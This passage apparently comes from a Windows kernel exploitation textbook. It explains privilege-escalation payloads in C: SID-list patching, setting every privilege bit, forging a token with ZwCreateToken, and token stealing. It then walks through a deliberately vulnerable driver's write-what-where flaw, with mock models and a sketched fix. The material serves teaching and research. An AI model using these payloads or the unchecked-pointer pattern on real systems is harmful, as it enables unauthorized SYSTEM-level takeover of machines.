
VOID ShellcodeSIDListPatch()
{
    PACCESS_TOKEN tok;
    PEPROCESS p;
    UINT32 sidCount;
    PSID_AND_ATTRIBUTES sidList;
    PISID localUserSid,userSid;

    p = PsGetCurrentProcess();                                   /* [1] */
    tok = PsReferencePrimaryToken(p);                            /* [2] */

    sidCount = GetOffsetUint32(tok,                              /* [3] */
        TargetsTable[LocalVersion].Values[LocalVersionBits].SidListCountOffset);
    sidList = GetOffsetPtr(tok,                                  /* [4] */
        TargetsTable[LocalVersion].Values[LocalVersionBits].SidListOffset);

    userSid = sidList->Sid;
    LocalCopyMemory(userSid,                                     /* [5] */
                    &SidSystem,
                    sizeof(SidSystem));

    DisableDenyOnlySID(sidList, sidCount);                       /* [6] */
    RemoveRestrictedSidList(tok);                                /* [7] */

    localUserSid = FindSID(sidList,                              /* [8] */
                           sidCount,
                           DOMAIN_ALIAS_RID_USERS);
    if(localUserSid)
        LocalCopyMemory(localUserSid,                            /* [9] */
                        &SidLocalAdminGroup,
                        sizeof(SidLocalAdminGroup));

    PsDereferencePrimaryToken(tok);                              /* [10] */
    return;
}

The preceding code does the following:

  • Finds the correct EPROCESS structure

  • Finds the access token associated with the EPROCESS structure

  • Finds the active SID list in the access token

  • Removes, if present, all deny-only flags on all active SIDs and clears the restricted SID list and counter if present

  • Replaces the current User Owner SID with the built-in NT AUTHORITY\SYSTEM SID

  • Replaces the local BUILTIN\Users Group SID with the local BUILTIN\Administrators SID
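The listing for ShellcodeSIDListPatch() relies on small helpers, such as GetOffsetUint32() and GetOffsetPtr(), whose bodies are not reproduced here. The following C fragment is a guess at what such helpers may look like, written as plain user-mode code so it can be tried against a fake buffer; the two-argument signatures follow the way the listing calls them, while ClearRestrictedSids() is a hypothetical name and takes explicit offsets instead of consulting the targets table.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Read a 32-bit value stored `offset` bytes into an opaque structure. */
uint32_t GetOffsetUint32(const void *base, size_t offset)
{
    uint32_t v;
    memcpy(&v, (const unsigned char *)base + offset, sizeof v);
    return v;
}

/* Read a pointer stored `offset` bytes into an opaque structure. */
void *GetOffsetPtr(const void *base, size_t offset)
{
    void *p;
    memcpy(&p, (const unsigned char *)base + offset, sizeof p);
    return p;
}

/* Hypothetical helper: zero the restricted SID counter and list pointer so
 * the access check no longer sees a restricted SID list. */
void ClearRestrictedSids(void *token, size_t countOffset, size_t listOffset)
{
    uint32_t zero = 0;
    void *null = NULL;

    memcpy((unsigned char *)token + countOffset, &zero, sizeof zero);
    memcpy((unsigned char *)token + listOffset, &null, sizeof null);
}
```

Keeping every structure access behind an offset reader is what lets a single routine serve several kernel releases: only the table of offsets changes, not the code.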

Let's discuss each of these steps in more detail.

Locate EPROCESS Structure

The first step is to find the target process's EPROCESS structure. It is possible to discover the EPROCESS structure associated with the currently running process by looking at the current Kernel Processor Control Block (KPRCB), an undocumented internal kernel structure used by the Kernel Executive for a variety of purposes. The KPRCB holds a reference to the current ETHREAD (Executive Thread Block) structure, which in turn holds a reference to the current EPROCESS structure. The KPRCB is located within the Kernel Processor Control Region (KPCR), an area that can be accessed easily by way of a special segment selector; on 32-bit kernels, the KPCR can be accessed via the FS segment, whereas on 64-bit kernels it is accessed via the GS segment.

As you can see, traversing kernel structures requires a good knowledge of their layout; this is complicated by the fact that these layouts can change from one kernel version to the next, and even from one service pack to the next. Whenever possible, it is preferable to make use of exported kernel APIs to avoid relying on hardcoded offsets that are likely to become useless. In this case, we can use the exported API PsGetCurrentProcess() [1]. The following tiny piece of assembly code, taken from the PsGetCurrentProcess() API on Windows Server 2003 SP2 32-bit, accomplishes exactly what we described earlier. It takes the ETHREAD structure from the KPRCB (FS:124h) and subsequently gets the EPROCESS structure stored at offset 38h within the ETHREAD structure. In so doing, it returns exactly what we need: the EPROCESS structure associated with the currently running process.

.text:0041C4FA _PsGetCurrentProcess@0 proc near

.text:0041C4FA mov eax, large fs:124h

.text:0041C500 mov eax, [eax+38h]

.text:0041C503 retn
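The pointer chase performed by these two instructions can be modeled in portable C. The following is only a sketch under stated assumptions: a byte array stands in for a 32-bit address space, the helper names (mock_read32(), mock_write32(), mock_current_eprocess()) are hypothetical, and the 124h and 38h offsets are the Windows Server 2003 SP2 32-bit values quoted above, which should not be expected to hold on other builds.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Offsets quoted in the text for Windows Server 2003 SP2 32-bit only. */
#define PCR_CURRENT_THREAD_OFFSET 0x124u /* fs:124h   -> current ETHREAD */
#define ETHREAD_PROCESS_OFFSET    0x38u  /* [eax+38h] -> EPROCESS        */

/* Read a 32-bit value from the fake address space (hypothetical helper). */
uint32_t mock_read32(const uint8_t *mem, size_t mem_size, uint32_t addr)
{
    uint32_t value;
    assert((size_t)addr + sizeof value <= mem_size); /* stay inside the model */
    memcpy(&value, mem + addr, sizeof value);
    return value;
}

/* Write a 32-bit value into the fake address space (hypothetical helper). */
void mock_write32(uint8_t *mem, size_t mem_size, uint32_t addr, uint32_t value)
{
    assert((size_t)addr + sizeof value <= mem_size);
    memcpy(mem + addr, &value, sizeof value);
}

/* Same two dereferences as the disassembly: KPCR -> ETHREAD -> EPROCESS. */
uint32_t mock_current_eprocess(const uint8_t *mem, size_t mem_size,
                               uint32_t fs_base)
{
    uint32_t ethread = mock_read32(mem, mem_size,
                                   fs_base + PCR_CURRENT_THREAD_OFFSET);
    return mock_read32(mem, mem_size, ethread + ETHREAD_PROCESS_OFFSET);
}
```

Planting a fake ETHREAD address at fs_base + 124h and a fake EPROCESS address at ETHREAD + 38h is enough to exercise the model. In a real payload, calling the exported API remains preferable precisely because it hides both offsets.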

We can now easily retrieve the EPROCESS structure of the current running process, but what if we want or need the EPROCESS structure of an entirely different process? It just so happens that there is an interesting exported API to do that as well; its name is PsLookupProcessByProcessId(), and its prototype is as follows:

NTSTATUS PsLookupProcessByProcessId(

IN HANDLE,

OUT PEPROCESS *

);

The PsLookupProcessByProcessId() function takes two arguments. The first argument is the process ID (PID), and the second is a pointer-to-pointer that will hold the EPROCESS structure address when the function successfully returns; if the process is not found, the function returns STATUS_INVALID_PARAMETER.

Locate the Access Token

The second step consists of getting the access token related to the EPROCESS structure. Again, we could dig into kernel structures and their relative offsets, or we could take a simpler and more reasonable approach and rely on an exported API; in this case, we will make use of PsReferencePrimaryToken() [2], which has the following function prototype:

PACCESS_TOKEN

PsReferencePrimaryToken(IN PEPROCESS);

This function takes the related EPROCESS structure as its only argument, returns the access token address, and increments the token's reference counter.

Note

When the access token in question isn't referred to by multiple processes (e.g., while access token stealing), our routine needs to be mindful to call the corresponding release API, PsDereferencePrimaryToken(), after having raised our target process's Privileges.

Patch the Access Token

Patching the access token involves five steps that target the active SID list. This series of steps:

  • Finds the access token associated with the current EPROCESS structure

  • Finds the active SID list in the access token

  • Removes, if present, all deny-only flags on all active SIDs

  • Removes, if present, the restricted SID list

  • Replaces the User Owner SID with the built-in NT AUTHORITY\SYSTEM account SID

First, we have to look at two important access token fields, UserAndGroupCount and UserAndGroup, which describe the SIDs in the active list. Since the contents of these fields reside at different offsets, the code at [3] and [4] makes use of a prebuilt offset table to retrieve their respective contents. This offset table is indexed using a runtime index corresponding to the currently running version of Windows.

The UserAndGroup pointer addresses a dynamically allocated array of SID_AND_ATTRIBUTES structures. Each structure is composed of only two fields: Sid, which is a pointer to the SID structure holding SID information; and Attributes, which stores the SID attribute flags. The first structure in the array is the Owner SID, which usually holds the current Local/Domain User SID. At [5], the function substitutes this User SID with the local NT AUTHORITY\SYSTEM SID (S-1-5-18) stored in the SidSystem variable. Later, at [6] and [7], the function invokes DisableDenyOnlySID() and RemoveRestrictedSidList(). DisableDenyOnlySID() strips the SE_GROUP_USE_FOR_DENY_ONLY flag from every SID in the active list, whereas RemoveRestrictedSidList() removes the restricted list, if present, by nullifying the list pointer and overwriting the counter with zero.
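To make the effect of the two helper routines concrete, here is a minimal user-space sketch of the same bit and pointer manipulations. It is not the book's DisableDenyOnlySID() or RemoveRestrictedSidList() code: the MOCK_ structures are hypothetical, heavily reduced stand-ins for the real token layout, and the restricted-list field names are assumptions made for illustration. Only the SE_GROUP_USE_FOR_DENY_ONLY value (0x10) is taken from the public Windows headers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define SE_GROUP_USE_FOR_DENY_ONLY 0x00000010u /* value from winnt.h */

/* Simplified stand-in for SID_AND_ATTRIBUTES: a pointer plus a flags word. */
typedef struct {
    void    *Sid;
    uint32_t Attributes;
} MOCK_SID_AND_ATTRIBUTES;

/* Hypothetical, reduced view of the token fields discussed in the text. */
typedef struct {
    uint32_t                 UserAndGroupCount;
    MOCK_SID_AND_ATTRIBUTES *UserAndGroup;
    uint32_t                 RestrictedSidCount; /* assumed field name */
    MOCK_SID_AND_ATTRIBUTES *RestrictedSids;     /* assumed field name */
} MOCK_TOKEN;

/* Clear the deny-only flag on every SID in the active list. */
void mock_disable_deny_only(MOCK_TOKEN *tok)
{
    assert(tok != NULL);
    for (uint32_t i = 0; i < tok->UserAndGroupCount; i++)
        tok->UserAndGroup[i].Attributes &= ~SE_GROUP_USE_FOR_DENY_ONLY;
}

/* Drop the restricted list: null the pointer and zero the counter. */
void mock_remove_restricted_list(MOCK_TOKEN *tok)
{
    assert(tok != NULL);
    tok->RestrictedSids = NULL;
    tok->RestrictedSidCount = 0;
}
```

The real routines operate on kernel memory located through the version-dependent offset table, so the field accesses above would become pointer arithmetic on the token base address.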

Fix Token Group

In addition to fixing the current user SID, it is also worthwhile to fix the Users group, which is done via the FindUserGroupSid() function. FindUserGroupSid() (at [8]) locates the local BUILTIN\Users Group SID. Next, at [9], the function overwrites the BUILTIN\Users Group SID with the BUILTIN\Administrators Group SID stored in the global SidLocalAdminGroup variable. Finally, at [10], the local access token is released using the corresponding API PsDereferencePrimaryToken() (decrementing its internal reference counter). Notwithstanding domain Group Policy settings, since the process now possesses the rights associated with Local System and Local Administrator, it is henceforth capable of accessing virtually all local resources, adding new local administrator users, modifying Local Security Policy, and so forth.

Privileges Patching

As we've seen already, NT 6.x kernels introduced the concept of active and restricted SID list checksums. By making use of the Privileges patching approach, we can avoid patching the SID list and, in turn, the checksum recovery procedure. The Privileges patching routine is split into two parts:

  • Kernel-mode elevation

    The kernel-mode portion of this attack is simpler than that used by the SID patching approach. On NT 6.x kernels, it simply overwrites the Privileges bitmap within the access token, adding a few super Privileges. The routine implementing the kernel-mode elevation payload is named ShellcodePrivilegesAdd(), and it exists within the Trigger64.c source file.

  • User-mode elevation

    The user-mode portion of the attack is far more elaborate than the kernel portion, and involves making use of an undocumented system call: ZwCreateToken(). This code creates a new token and associates it with a newly spawned process. In this manner, we can create from scratch a totally new token with an arbitrary SID list. After the kernel payload has been executed, the current (or target) process possesses every possible privilege (including, of course, the subset of super Privileges), and it is able to access virtually any object (using SeTakeOwnershipPrivilege), debug any process (using SeDebugPrivilege), or even load a custom device driver (using SeLoadDriverPrivilege).

As one can see, there are many vectors we can now use to increase our influence on the local system. We chose to present the arbitrary token creation approach for the following reasons:

  • It does not involve loading device drivers (no kernel tainting; avoids driver signing).

  • It does not involve system service code injection (we work only on our process).

  • It does not steal the ownership of objects (that is, we do not make use of SeTakeOwnershipPrivilege multiple times to change the ownership of objects, which would trigger suspicious system events).

  • We can indirectly control all access control mechanisms (or, at the very least, those related to the SID list, Privileges list, and even integrity levels).

Kernel-Mode Payload

As usual, let's begin by taking a look at some code:

typedef struct _SEP_TOKEN_PRIVILEGES

{

UINT64 Present;

UINT64 Enabled;

UINT64 EnabledByDefault;

} SEP_TOKEN_PRIVILEGES, *PSEP_TOKEN_PRIVILEGES;

VOID ShellcodePrivilegesAdd()

{

PACCESS_TOKEN tok;

PEPROCESS p;

PSEP_TOKEN_PRIVILEGES pTokPrivs;

p = PsGetCurrentProcess(); [1]

tok = PsReferencePrimaryToken(p); [2]

pTokPrivs = GETOFFSET(tok, [3]

TargetsTable[LocalVersion].Values[LocalVersionBits]

.PrivListOffset);

pTokPrivs->Present = pTokPrivs->Enabled = [4]

pTokPrivs->EnabledByDefault =

0xFFFFFFFFFFFFFFFFULL;

PsDereferencePrimaryToken(tok);

return;

}

Steps [1] and [2] obtain the access token in the same way that ShellcodeSIDListPatch() does. They get the EPROCESS structure using the PsGetCurrentProcess() kernel API, and then reference the access token using the PsReferencePrimaryToken() kernel API. At [3], the code locates the SEP_TOKEN_PRIVILEGES structure within the access token. Unlike the SID lists, this structure is embedded in the access token on NT 6.x kernels; the GETOFFSET() macro simply adds the correct offset to the access token structure pointer to locate the beginning of the SEP_TOKEN_PRIVILEGES field. The code at [4] is straightforward. It overwrites all of the bitmasks within SEP_TOKEN_PRIVILEGES, adding all possible privileges to the current access token. The kernel does not perform any checksums on the Privileges bitmasks. Although it would have been sufficient to patch only the Present field, the function also patches the Enabled and EnabledByDefault fields. Enabling the privileges during the kernel payload step saves us from having to enable them later, during the user-mode elevation step.
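The listing does not show the definition of GETOFFSET(), so the following user-space sketch assumes the simplest plausible shape for it: byte-wise pointer arithmetic on the token base. The MOCK_SEP_TOKEN_PRIVILEGES type, the mock_privileges_add() function, and the offset passed to it are all illustrative; a real payload takes the offset from the per-version table.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Mirrors the three 64-bit bitmaps of SEP_TOKEN_PRIVILEGES shown above. */
typedef struct {
    uint64_t Present;
    uint64_t Enabled;
    uint64_t EnabledByDefault;
} MOCK_SEP_TOKEN_PRIVILEGES;

/* Assumed shape of the macro: add a byte offset to a base pointer. */
#define GETOFFSET(base, off) ((void *)((uint8_t *)(base) + (off)))

/* Set every bit in all three privilege bitmaps of a fake token buffer.
 * The caller must pass an offset that keeps the structure 8-byte aligned. */
void mock_privileges_add(void *token, size_t priv_offset)
{
    assert(token != NULL);
    MOCK_SEP_TOKEN_PRIVILEGES *privs = GETOFFSET(token, priv_offset);
    privs->Present = privs->Enabled = privs->EnabledByDefault = UINT64_MAX;
}
```

Because the write is a plain store of three 64-bit values, nothing outside the 24-byte structure is touched, which is what makes this payload so much smaller than the SID list patching routine.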

User-Mode Elevation

The user-mode elevation routine comprises two functions: CreateTokenFromCaller() and SpawnChildWithToken(). CreateTokenFromCaller() is used to create a new access token with arbitrary rights and privileges using the undocumented ZwCreateToken() API. SpawnChildWithToken() is a simple wrapper to the CreateProcessAsUser() API, which is used to spawn a new process holding a different access token. The most important snippets from the CreateTokenFromCaller() function, for the sake of this discussion, follow. You can find the fully commented code in the Trigger64.c source file.

BOOL CreateTokenFromCaller(PHANDLE hToken)

{

[ … ]

if(!LoadZwFunctions(&ZwCreateTokenPtr)) [1]

return FALSE;

__try

{

ret = OpenProcessToken(GetCurrentProcess(), [2]

TOKEN_QUERY | TOKEN_QUERY_SOURCE,

&hTokenCaller);

if(!ret)

__leave;

[ … ]

lpStatsToken = GetInfoFromToken(hTokenCaller, TokenStatistics);

lpGroupToken = GetInfoFromToken(hTokenCaller, TokenGroups); [3]

lpPrivToken = GetInfoFromToken(hTokenCaller, TokenPrivileges); [4]

pSid=lpGroupToken->Groups;

pSidSingle = FindSIDGroupUser(pSid, lpGroupToken->GroupCount, [5]

DOMAIN_ALIAS_RID_USERS);

if(pSidSingle)

memcpy(pSidSingle, [6]

&SidLocalAdminGroup,

sizeof(SidLocalAdminGroup));

for(i=0; i<lpGroupToken->GroupCount; i++,pSid++) [7]

{

if(pSid->Attributes & SE_GROUP_INTEGRITY)

memcpy(pSid->Sid,

&IntegritySIDSystem,

sizeof(IntegritySIDSystem));

pSid->Attributes &= ~SE_GROUP_USE_FOR_DENY_ONLY;

}

lpOwnerToken = LocalAlloc(LPTR, sizeof(PSID));

lpOwnerToken->Owner = GetLocalSystemSID();

lpPrimGroupToken = GetInfoFromToken(hTokenCaller, TokenPrimaryGroup);

lpDaclToken = GetInfoFromToken(hTokenCaller, TokenDefaultDacl);

pluidAuth = &authid;

li.LowPart = 0xFFFFFFFF;

li.HighPart = 0xFFFFFFFF;

pli = &li;

sessionId = GetSessionId(hTokenCaller); [8]

ntStatus = ZwCreateTokenPtr(hToken, [9]

TOKEN_ALL_ACCESS,

&oa,

TokenPrimary,

pluidAuth,

pli,

&userToken,

lpGroupToken,

lpPrivToken,

lpOwnerToken,

lpPrimGroupToken,

lpDaclToken,

&sourceToken);

if(ntStatus == STATUS_SUCCESS)

{

ret = SetSessionId(sessionId, *hToken); [10]

sessionId = GetSessionId(*hToken);

ret = TRUE;

}

[ … ]

To summarize, this function gets the current process's access token, extracts the SID list and Privileges list, manipulates the SID list, and uses the modified version of the current token to create a brand-new access token.

At [1], the code invokes LoadZwFunctions(), which stores into the ZwCreateTokenPtr function pointer the address of the ZwCreateToken() API. Since the function is not intended to be directly imported by third-party code, LoadZwFunctions() invokes the GetProcAddress() API, passing the ntdll.dll module handle to get the address of the ZwCreateToken() function using runtime dynamic linking in much the same way that we extracted NtQuerySystemInformation() when listing the kernel module's name and base address.

At [2], the function opens the current process's access token object and stores the resulting handle in hTokenCaller. As we saw before, almost everything under Windows is an object, and a handle can be opened to it.

At [3] and [4], the function extracts the current SID list and Privileges list from the current token and copies them into user-space memory.

At [5], the function invokes the FindSIDGroupUser() custom function, which is the same function used in the SID list patching technique presented before. It finds the BUILTIN\Users Group SID and returns its actual address in memory. This time the function is not called from the kernel shellcode to manipulate the kernel structure; instead, it is used to access the user-land buffer into which the kernel structure was copied. The function works well in this context since the structure layout we are interested in has been preserved during the user-land copy.

Next, at [6], the function substitutes the BUILTIN\Administrators Group SID in place of the BUILTIN\Users Group SID it has just located.

The loop at [7] scans the SID list once again, in search of an integrity level SID. As seen in the SID description, the integrity level is implemented as a special type of SID. After finding this SID, the code overwrites it with the system integrity SID (which is a powerful integrity level if we do not consider the protected process integrity SID used by DRM protected services). The code in the loop also clears any deny-only SID-related flags.

At [8], the function obtains the current Session ID. This step requires further explanation. The concept of a Session was introduced with the advent of Terminal Services, which were created to allow different users to share a single Windows system via multiple graphics terminals. Since Windows was not originally designed to be a multiuser environment, it assigned global names to many system objects and resources. With the advent of Sessions, the Object Manager is able to virtually separate global objects’ namespaces (such as the Window Station, desktops, etc.), allowing operating system services to each access their Session-private resources as though they were global. The Session ID uniquely identifies a given existing session within the system. Every time a user interactively logs on to the machine, Windows creates a new Session, associates it with a Window Station, and then associates the desktops with the Window Station.

To further complicate this mechanism, Windows NT 6.x kernels introduced the Session 0 Isolation concept. On older (NT 5.x) systems, the first user to interactively log on to the system shares the same session (Session 0) with system processes and services. On Windows NT 6.x systems, however, Session 0 (the first session) is noninteractive, and is available only to system processes and services (isolation). The first interactive user to log on is associated with Session 1, the second with Session 2, and so on. Session 0 Isolation separates privileged services from interactive console user access, thus putting an end to all Shatter-like attacks.2

But why is our Session number so important to us? The answer lies in the way that the token is built. When a new access token is created (at [9]), the kernel sets Session 0 as the default session. Let's suppose that we are running the exploit from the local console (when dealing with NT 6.x systems), or by way of a remote Terminal Services session. If we run the new process using the modified-privilege access token, the child process will run by default in Session 0, which would not give us the opportunity to interact with the process through the current Window Station/desktop.

To avoid this problem, we can set the access token session to the current one, via the SetSessionId() function at [10]. This function internally invokes the SetTokenInformation() API, passing the Session ID obtained previously, at [8]. SetSessionId() requires the invoking process to own the SeTcbPrivilege, but in the current case this isn't a problem, as we've already gained possession of every Privilege on the system, thanks to the execution of our kernel payload. We may now safely run the child program using the SpawnChildWithToken() function, an excerpt from which follows:

BOOL SpawnChildWithToken(HANDLE hToken, PTCHAR command)

{

[ … ]

pSucc = CreateProcessAsUser(hToken,

NULL,

(LPTSTR)szLocalCmdLine,

&sa, &sa,

FALSE,

0,

NULL,

NULL,

&si, &pi);

[ … ]

The only meaningful function that this wrapper calls is the CreateProcessAsUser() API. By default, every newly created process inherits the access token of its parent. With this API, however, we can specify which access token to use; as one may expect, we will pass the access token created by the ZwCreateToken() function. If this function executes successfully, we will be in possession of a process having the highest possible privilege. Figure 6.5 shows the access token before spawning the child process (and hence before changing the SIDs) but after the kernel payload has been executed (all Privileges enabled).

Figure 6.5 Process after kernel payload execution.

Token Stealing

The token-stealing technique, a well-known method that many published kernel exploits already use3 and that is discussed in several whitepapers,4 involves the exchange of the target process's access token with the access token of another process. To be more specific, the access token of a more privileged process is copied over the target process's access token. Since the access token is not a simple structure, usually the code just replaces the access token reference within the EPROCESS structure.

This approach has both advantages and drawbacks. Let's start with the advantages. First, we only need to manage the EPROCESS structure. Second, we can avoid having to hardcode any offsets, since we know the access token pointer is located within the EPROCESS structure and we have a well-known API, PsReferencePrimaryToken(), which can tell us the access token's address. The only thing we need to do is scan the EPROCESS structure, trying to locate the same address returned by the API. When the addresses are the same, we have found the correct offset and we can then overwrite it with the more privileged access token.

We have to consider just a few more things: how big the EPROCESS structure is, and in what manner the access token address is stored within the EPROCESS structure.

The EPROCESS structure size may vary among Windows releases, but we can ignore this issue for two reasons. First, the structure is always allocated in the nonpaged pool, which is always mapped using 4MB-wide Large Pages (2MB wide when PAE is enabled on a 32-bit kernel). The odds of finding the EPROCESS structure allocated near the end-of-page boundary are so small that we can ignore this possibility. Moreover, the access token reference pointer is always stored in the first half of the structure, so we can always safely use the smallest size.

The second reason we can ignore this issue has to do with the way the access token reference is stored within the EPROCESS structure. The following code snippet shows the access token reference encountered on a Windows Server 2003 SP2 32-bit system. As usual, the WinDbg dt command is used.

0: kd> dt nt!_EPROCESS

+0x000 Pcb : _KPROCESS

+0x078 ProcessLock : _EX_PUSH_LOCK

[ … ]

+0x0d4 ObjectTable : _HANDLE_TABLE

+0x0d8 Token : _EX_FAST_REF

[ … ]

The Token field is of type EX_FAST_REF. This is its structure:

typedef struct _EX_FAST_REF{

union

{

PVOID Object;

ULONG RefCnt: 3;

ULONG Value;

};

} EX_FAST_REF, *PEX_FAST_REF;

The EX_FAST_REF structure holds a union. Every element shares the same storage; notably, RefCnt (short for reference counter) occupies the three least-significant bits of that storage. The access token structure is always allocated on an 8-byte boundary, so the last three bits of its address are always zero. This means the last three bits of the Object pointer, where the access token's address is stored, can be used as a reference counter; the contents of these three bits are therefore not part of the address. To compute the correct address, we need to zero the last three bits of each value we read while scanning the EPROCESS structure for the access token. We can do this easily using a logical AND with a value of ~7.
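The scan just described can be sketched in a few lines of portable C. This is a user-space model rather than the exploit's actual routine: find_token_offset() is a hypothetical name, the "EPROCESS" is simply an array of pointer-sized slots, and the mask follows the 3-bit RefCnt layout shown above for the 32-bit kernel.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define FAST_REF_MASK ((uintptr_t)7) /* low three bits hold RefCnt */

/* Scan pointer-sized slots of a fake EPROCESS for the token address.
 * Returns the byte offset of the matching slot, or -1 if none matches. */
long find_token_offset(const uintptr_t *eprocess, size_t scan_bytes,
                       uintptr_t token)
{
    assert(eprocess != NULL);
    assert((token & FAST_REF_MASK) == 0); /* the API returns a clean address */

    for (size_t i = 0; i < scan_bytes / sizeof(uintptr_t); i++) {
        /* Strip the embedded reference counter before comparing. */
        if ((eprocess[i] & ~FAST_REF_MASK) == token)
            return (long)(i * sizeof(uintptr_t));
    }
    return -1;
}
```

In the kernel, token would be the value returned by PsReferencePrimaryToken() and scan_bytes the smallest known EPROCESS size. Once the offset is known, the same slot in the target process can be overwritten with the more privileged token reference.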

Despite the fact that this is a far simpler approach than the SID list patching and Privileges patching techniques, there are a couple of drawbacks to its use. First, the token-stealing methodology is a rather invasive approach. It subverts the internal kernel logic, as it allows more processes to access a shared resource without the kernel's awareness. Moreover, any operation done on the access token, although it is shared among processes, gets reflected on the same structures, thereby creating one or more internal inconsistencies, which could create trouble when the exploit process exits. In some circumstances, this could even cause a kernel crash. A safer solution involves the temporary substitution of the access token for only a very brief period of time, during which the exploit process creates a secondary channel to elevate privileges (e.g., install a system service, load a driver, etc.) and then restores the original token.

The other drawback is not a big deal; it basically revolves around the fact that we are stuck with the victim process's token, as is. We can nullify this drawback by adding more code; if we need a special combination of SIDs/Privileges, for example, we'd need to patch the token. In this scenario, choosing the SID list patching or Privileges patching technique is probably better since we'd wind up having to modify the token anyway.

Practical Windows Exploitation

Thus far, we have seen how to elevate the privileges of a target process after getting control of the execution flow. In this section, we will discuss how to take control of the execution flow by exploiting the two custom vulnerabilities presented in the DVWD package: an arbitrary memory overwrite and a stack buffer overflow. The exploit code is present in the DVWDExploits package, which you can find on this book's companion Web site, www.attackingthecore.com.

Arbitrary Memory Overwrite

Arbitrary memory overwrite, also known as the “write-what-where” vulnerability, is the most common vulnerability affecting Windows kernel drivers. This kind of vulnerability is mainly due to failure or incorrect use of the user-land validation kernel APIs. Notwithstanding this main cause, write-what-where vulnerabilities can also be caused as a direct or indirect consequence of buffer overflows, logical bugs, or race conditions. Usually, when facing this kind of vulnerability we are able to overwrite a controlled memory address with one or more bytes. The content of those bytes may be controlled, partially controlled, or even unknown. Of course, when we have full control over the overwritten bytes the game becomes trivial. In all other scenarios the exploitation vector may change, but kernel arbitrary overwrite vulnerabilities are always likely to be exploitable.

Note

Actually, a lot of write-what-where vulnerabilities have been found in many third-party drivers, not excluding security products like AVs and Host IDSs.

Before showing the different exploitation vectors, it is worth introducing the vulnerable DVWD Device I/O Control routine. The vulnerable code is divided into two different I/O Control routines. The former is used to save a user-land memory buffer into kernel memory (DEVICEIO_DVWD_STORE) and the latter is used to retrieve this data back to user land (DEVICEIO_DVWD_OVERWRITE). Of course, the vulnerability lies in the latter I/O Control routine. Let's take a look at the code implementing it:

typedef struct _ARBITRARY_OVERWRITE_STRUCT

{

PVOID StorePtr;

ULONG Size;

} ARBITRARY_OVERWRITE_STRUCT, *PARBITRARY_OVERWRITE_STRUCT;

NTSTATUS TriggerOverwrite(PVOID stream)

{

ARBITRARY_OVERWRITE_STRUCT OverwriteStruct;

NTSTATUS NtStatus = STATUS_SUCCESS;

__try

{

RtlZeroMemory(&OverwriteStruct,

sizeof(ARBITRARY_OVERWRITE_STRUCT));

ProbeForRead(stream, [1]

sizeof(ARBITRARY_OVERWRITE_STRUCT),

TYPE_ALIGNMENT(char));

RtlCopyMemory(&OverwriteStruct, [2]

stream,

sizeof(ARBITRARY_OVERWRITE_STRUCT));

GetSavedData(&OverwriteStruct); [3]

}

__except(ExceptionFilter())

{

NtStatus = GetExceptionCode();

}

return NtStatus;

}

VOID GetSavedData(PARBITRARY_OVERWRITE_STRUCT OverwriteStruct)

{

ULONG size = OverwriteStruct->Size;

if(size > GlobalOverwriteStruct.Size) [4]

size = GlobalOverwriteStruct.Size;

RtlCopyMemory(OverwriteStruct->StorePtr, [5]

GlobalOverwriteStruct.StorePtr,

size);

}

The function TriggerOverwrite() is called by the DEVICEIO_DVWD_OVERWRITE handler, DvwdHandleIoctlOverwrite(). Its only parameter, “PVOID stream,” addresses the user-land buffer specified by the calling process via the Device I/O Control routine. This pointer should address a user-land structure of type ARBITRARY_OVERWRITE_STRUCT. The structure is composed of two fields: StorePtr, a pointer to the data buffer, and Size, the size of the data. The code verifies that the whole structure is located within the user-land range [1] and copies it into a local kernel OverwriteStruct structure [2]. Just after copying the structure into kernel memory, it invokes the GetSavedData() function [3]. This function is responsible for copying the previously saved data (DEVICEIO_DVWD_STORE) into the user-land buffer specified by StorePtr. At [4] the code clamps the requested size to the size of the saved data, and at [5] it copies the saved data into the destination buffer.

This time, however, the code omits the user-land pointer check that it performed earlier when copying the ARBITRARY_OVERWRITE_STRUCT. The function “trusts” the StorePtr value and copies the saved data to the memory it points to. If the user-land process specifies an evil value (e.g., a kernel address), the GetSavedData() function ends up overwriting an arbitrary kernel memory range. Since we were able to save arbitrary data beforehand using DEVICEIO_DVWD_STORE, we can later overwrite an arbitrary number of bytes with arbitrary attacker-controlled data. The sample has been written this way to cover most scenarios; for example, we can emulate a 4-byte or a 1-byte arbitrary overwrite simply by tuning the DEVICEIO_DVWD_STORE Device I/O Control request accordingly.
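To make the missing validation explicit, the following user-space model shows the kind of range check that GetSavedData() lacks. It is a sketch, not driver code: addresses are plain 32-bit integers, the mock_ functions are hypothetical, and MOCK_USER_PROBE_ADDRESS is an assumed value for the user/kernel boundary on 32-bit x86. In a real driver this role would presumably be played by a call such as ProbeForWrite() on StorePtr before the copy at [5].

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Assumed upper bound of user space on 32-bit x86 (illustrative value). */
#define MOCK_USER_PROBE_ADDRESS 0x7FFF0000u

/* True when [addr, addr + len) lies entirely below the assumed boundary. */
bool mock_range_is_user(uint32_t addr, uint32_t len)
{
    uint64_t end = (uint64_t)addr + len; /* 64-bit sum cannot wrap around */
    return end <= MOCK_USER_PROBE_ADDRESS;
}

/* Model of GetSavedData() with the check added. Returns the number of
 * bytes that would be copied, or 0 when the destination is rejected. */
uint32_t mock_get_saved_data(uint32_t store_ptr, uint32_t requested,
                             uint32_t saved)
{
    /* Mirrors the clamp at [4]. */
    uint32_t size = requested > saved ? saved : requested;
    assert(size <= saved); /* never copy more than was stored */

    if (!mock_range_is_user(store_ptr, size))
        return 0; /* a real driver would raise an access violation here */
    return size;
}
```

With the check in place, a destination such as HalDispatchTable + 4 is refused before any byte is written, whereas the vulnerable version happily performs the copy.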

There are different ways this kind of vulnerability can be exploited. In the next section a couple of those techniques will be shown. It is important to note that these techniques are just two among many different vectors we can use to hijack a kernel control path after overwriting kernel data. The former involves the overwriting of function pointers held by static kernel dispatch tables and the latter targets dynamically allocated kernel structures, from which corresponding addresses can be leaked from unprivileged user-land processes.

Overwriting Kernel Dispatch Tables

